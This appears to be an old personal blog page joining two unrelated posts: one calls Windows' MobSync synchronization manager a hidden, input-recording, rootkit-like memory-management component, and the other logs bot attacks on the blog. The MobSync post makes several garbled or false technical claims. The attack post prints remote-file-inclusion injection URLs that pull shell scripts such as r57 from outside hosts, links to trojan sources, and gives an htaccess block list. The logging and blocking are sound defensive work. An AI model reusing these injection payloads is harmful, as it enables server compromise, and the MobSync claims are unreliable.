MobSync is a Microsoft Mobile Synchronization Manager available in Win 2000 & Windows XP

Excerpt from Microsoft KB 314512 Articles (2002)

The Windows XP Synchronization Manager helps ensure that the files and folders on your mobile device and your desktop computer stay synchronized. With Synchronization Manager, you can be sure you are always working with the latest copy of your data, online or offline.

Technically MobSync is part of Windows Memory Management, its prefetch (type of cache) your External Device Contents (Mobile PC, Windows Embed XPE, PDA,database etc .. ) thus helps speed up the Windows booting process by shortening the time external device programs takes to start up.

MobSync Issue

MobSync is registered to run on logon but the process is hidden on others ‘Scans Tools’ like Autoruns.exe & Process.exe (SysInternal).

QuickFact:

• MobSync.exe can record inputs.
• Its hide itself from monitor applications.

Apparently because of its transparencies nature to hide behind windows systems some hackers decide to reverse engineer this programs as a Trojan Rootkit.

Should I disabled Mobsync?

If you used windows for surfing and office works you probably wont need this programs (crapware) most modern mobile device has a build in Synchronization Manager and doesnt relies on microsoft mobsync (dependencies issue). Its recommended to disabled this programs as it can hide itself from being monitored and doesnt showup on running process lists.

Step by step guide to disabled MobSync from your windows.

1. Disabled System Restore

   You will need to disabled Windows System Restore (Temporary).

2. View hidden system files

   Suspicious files is known to hide itself as Windows System files. The following settings will set all hidden files viewable so we could removed it.

   • Click on Windows Start → Control Panel → Folder Options → View Tab
   • Turn on the option to show hidden files

3. Clean Temporary Files and Windows Prefetch Files

   This wont harm your system. Removes all files inside the following directory. Remove the contents only not the folders.

   • C:\temp
   • C:\windows\temp
   • C:\Documents and Settings\<username>\Local Settings\Temp
   • C:\windows\prefetch

4. Boot in SafeMode

   Restart your PC in safe mode. Refer KB 31522 on How To Boot in Safe Mode.

5. Disabled MobSync Process

   1. Click on start → Run → mobsync
   2. Next, Click on Setup buttons
   3. On “Synchronizations Settings” Windows Logon/Logoff tab un-check all the following options:

      Automatically Synchronize the following items:

      • When I log on to my computer
      • When I log off to my computer
   4. While still in “Synchronizations Settings” Windows select the next tab label “on Idle” un-check the following items:
      • Synchronize the selected items while my computer is idle

6. Removed from system registry

   If you arent familiar with registry you may skip this part. Most normal startup programs can be found at the following registry path.

   • HKLM\Software\Microsoft\Windows\CurrentVersion\Run
   • HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
   • HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
   • HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
   • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
   • HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce

   In Windows XP all loaded “startup programs” (start menu/startup items) can be found at HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg

   Mobsync registry HKLM\Software\Microsoft\Windows\CurrentVersion\syncmgr

Note on using Rootkit Scanner.

• James A. Eshelman HijackThis
• SysInternal RootkitRevealer
• F-secure Blacklight

Most advance Rootkit has a self mechanism to shutdown the system if any of this programs is identify in the memory. If you had this programs installed its advice to rename the programs first.

• RootKitRevealer.exe → RKV.exe
• HijackThis → hjct.exe

How to validate if the running programs is Tempered

Get Certificate Verification Tool ( WM Software Corp) and verify the programs signature or you could also run Microsoft sigverif.exe (c:\windows\SIGVERIF.TXT) to verify digital signature.

Caveat: Most Rookit is “padded/mugged” with unix controls character so its not readable by Windows (ANSI).

Setupapi.log entries

Setupapi.log can be found inside c:\windows\setupapi.log You need to enabled logging in verbose mode to get proper setup log.
HKLM\Software\Microsoft\Windows\CurrentVersion\SetupLogLevel

Insert DWORD value 0000FFFF to enabled verbose mode logging

Insert DWORD value 0 to disabled it

Tempered MobSync.exe & similar windows networks files.

An unsigned or incorrectly signed file
(c:\windows\msdownld.tmp\as03b1e1.tmp\mobilepk.inf) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\msidle.dll to
C:\WINDOWS\SYSTEM\msidle.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\msidle.dll) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobsync.exe to
C:\WINDOWS\SYSTEM\mobsync.exe.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobsync.exe) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobsync.dll to
C:\WINDOWS\SYSTEM\mobsync.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobsync.dll) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\sens.dll to
C:\WINDOWS\SYSTEM\sens.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\sens.dll) was installed. Error 0x800b0003:
The form specified for the subject is not one supported or known by the
specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\sensapi.dll to
C:\WINDOWS\SYSTEM\sensapi.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\sensapi.dll) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\senscfg.dll to
C:\WINDOWS\SYSTEM\senscfg.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\senscfg.dll) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\es.dll to
C:\WINDOWS\SYSTEM\es.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\es.dll) was installed. Error 0x800b0003:
The form specified for the subject is not one supported or known by the
specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\esshared.dll to
C:\WINDOWS\SYSTEM\esshared.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\esshared.dll) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\estier2.dll to
C:\WINDOWS\SYSTEM\estier2.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\estier2.dll) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\sage.vxd to
C:\WINDOWS\SYSTEM\sage.vxd.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\sage.vxd) was installed. Error 0x800b0003:
The form specified for the subject is not one supported or known by the
specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\esenu.dll to
C:\WINDOWS\SYSTEM\esenu.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\esenu.dll) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobilepk.inf to
C:\WINDOWS\INF\mobilepk.inf.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobilepk.inf) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\chnscsvr.hlp to
C:\WINDOWS\help\chnscsvr.hlp.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\chnscsvr.hlp) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobilepk.cat to
C:\WINDOWS\SYSTEM\sfp\ie\mobilepk.cat.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobilepk.cat) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobsync.hlp to
C:\WINDOWS\help\mobsync.hlp.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobsync.hlp) was installed. Error
0xe000022f: The third-party INF does not contain digital signature information.

Summary

What really bother me, is Microsoft Windows Setup API. Any downloaded Microsoft system files has embed sign-in digital signature. Windows installation will validate all setup file and logs out error if the file has a bad signature (third party signature or file being tempered). The flaw is within the Windows Setup API itself. It doesn’t protect you from installing bad programs.

You should thanks Microsoft developer for making good Installation Programs and reporting tools. it remind you of error but installed it nonetheless.

External Links

• MSDN System Event Notification Service (SENS)

For this past three days this blog is suffering DOS attack . The attack is still alive now I don’t think they will leave yet.

I cant banned this bot directly as they were sending forge packet (packet spoofing) as googlebot http://www.whois-search.com/whois/64.233.166.136. Im still looking for the right ISP.

OrgName: Google Inc.
OrgID: GOGL
Address: 1600 Amphitheatre Parkway
City: Mountain View
StateProv: CA
PostalCode: 94043
Country: US

At the time being I blocked all remote streams from their random host *.com and “perl bot signature” but blocking will not stop them from hammering this site. I’ll be sending 503 (Service Unavailable) on certain request so if you are having problem accessing this site please check back later.

Type of injections

There is lot uri parameter in my logs (I will disabled server logs - limit resources) they probably has a large inventories check-lists of known CMS vulnerabilities. I can only confirm that its a blackhat seo spams bot as they request uri include the typical order.php page.

/es/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-ja
 gger-goro-class-mailphp/order.php/?wp=http://hom3.t35.com/xpl/hack/id.txt?
/es/wordpress/order.php/?wp=http://hom3.t35.com/xpl/hack/id.txt?
/order.php?wp=http://hom3.t35.com/xpl/hack/id.txt?

To view the following source you need to exclude the website host from your anti-virus program.

• Perl/ShellBot.B trojan - http://hom3.t35.com/xpl/fidz/hack/bnc.txt
• PHP/Rst.S Trojan - http://hom3.t35.com/xpl/fidz

htaccess blocked bad Code Injector and Perl Bot (Botnet)

If you has similar problems. you should block the following domain in your htaccess.
mod_setenvif

SetEnvIfNoCase Referer "^http://(www.)?t35\.com" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www.)?jorgevolio\.com" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www.)?emabe\.com" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www.)?pawang\.in" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www.)?gw-gold\.net" codeinjector_ref=1
SetEnvIfNoCase User-Agent "^libwww-perl*" shell_bots=1
SetEnvIfNoCase User-Agent "^Amidalla*" shell_bots=1

<FilesMatch "(.*)">
Order Allow,Deny
Allow from all
Deny from env=codeinjector_ref
Deny from env=shell_bots
</FilesMatch>

if u arent sure if you server support mod_setenvif wrap it like the below example.

<IfModule mod_setenvif.c>
#...replace this line with the above code...
</IfModule>

How to trap Perl Shell Bot

We need a pattern to trap this bots. certainly we knew that these bots :

• doesn’t honor robot.txt
• they crawl all subdirectory
• they has a pattern URI request

For now I only create subdirectory for auto-ban (and some other stuff) based on their pattern. alexa bot will be banned too as they dont honor robot.txt.

I’ll be updating this post from time to time. Do check the related articles on how to packet spoofing and validating forge/spoof packet.

Recent Scan & Update

The below list is automatically added.

December 24, 2007

ip: 64.26.63.10 param: login=,? inject: http://pawang.in/r57.txt

December 24, 2007

ip: 64.26.63.10 param: dir=,login= inject: http://pawang.in/r57.txt????

December 25, 2007

ip: 59.158.128.138 param: p=,:allinurl= inject: http://gw-gold.net/jpg/pictures/test.txt

External Resources

• Packet spoofing - http://www.wireshark.org
• pcapdiff validate forged packet http://www.eff.org/testyourisp/pcapdiff/